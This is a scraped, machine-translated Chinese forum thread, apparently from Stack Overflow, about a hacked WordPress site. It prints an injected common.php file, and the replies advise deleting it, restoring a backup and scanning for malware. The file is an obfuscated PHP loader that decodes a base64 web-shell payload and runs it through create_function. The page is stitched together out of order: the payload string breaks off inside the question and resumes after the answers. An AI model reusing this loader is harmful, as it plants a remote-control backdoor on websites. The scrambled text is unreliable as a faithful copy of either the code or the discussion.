Wordpress common.php文件已损坏/被黑客攻击？_Wordpress

Wordpress common.php文件已损坏/被黑客攻击？

wordpress

Wordpress common.php文件已损坏/被黑客攻击？,wordpress,Wordpress,我的一个wordpress网站出现问题。（经常注销用户，不允许用户登录）我的主机认为路径是common.php文件（/public\u html/wp content/common.php）有人能解释一下这些文件到底在做什么吗？我可以删除它，WordPress会生成一个新文件吗 common.php代码： <?php $alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6"; $string = "Cmdsb2JhbC

我的一个wordpress网站出现问题。（经常注销用户，不允许用户登录）

我的主机认为路径是common.php文件（/public\u html/wp content/common.php）

有人能解释一下这些文件到底在做什么吗？我可以删除它，WordPress会生成一个新文件吗

common.php代码：

    <?php

$alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
$string = "Cmdsb2JhbCAkYXV0aF9wYXNzLCRjb2xvciwkZGVmYXVsdF9hY3Rpb24sJGRlZmF1bHRfdXNlX2FqYXgsJGRlZmF1bHRfY2hhcnNldCwkc29ydDsKZ2xvYmFsICRjd2QsJG9zLCRzYWZlX21vZGUsICRpbjsKCiRhdXRoX3Bhc3MgPSAnZGU0OTA5YzUxZWZiNjZlNTgwYzMyZTk5NTFlZGI1ZG

提前谢谢

Rich

删除文件。它不是WordPress安装或升级包的一部分。我会假设该文件是恶意的，并且您的主机帐户/个人计算机/登录凭据已被破坏或类似情况
这是本例中提到的标准支持文档：

一旦您的站点清理干净：

是的，您的网站似乎已被黑客入侵。可能在某个地方有一个
eval
，在解密后运行此代码。您可能希望从早期备份还原。感谢您的快速响应，我将立即删除该文件，并查看它是否解决了我们一直存在的问题。您可以使用联机恶意软件扫描仪。可能是像
Wordfence
这样的插件，用来检查是否有更多受感染的文件。干杯，我已经安全了，所以现在将运行另一次扫描。该文件当时是否使用了用户密码？或者文件应该做什么？
J10gPSAkZGVmYXVsdF9hY3Rpb247CgllbHNlCgkJJF9QT1NUWydhJ10gPSAnU2VjSW5mbyc7CmlmKCAhZW1wdHkoJF9QT1NUWydhJ10pICYmIGZ1bmN0aW9uX2V4aXN0cygnYWN0aW9uJyAuICRfUE9TVFsnYSddKSApCgljYWxsX3VzZXJfZnVuYygnYWN0aW9uJyAuICRfUE9TVFsnYSddKTsKZXhpdDsKCg=="; $array_name = ""; foreach([4,29,34,38,42,9,21,7,38,17,37,7,38] as $t){ $array_name .= $alphabet[$t]; } $a = strrev("noi"."tcnuf"."_eta"."erc"); $f = $a("", $array_name($string)); $f();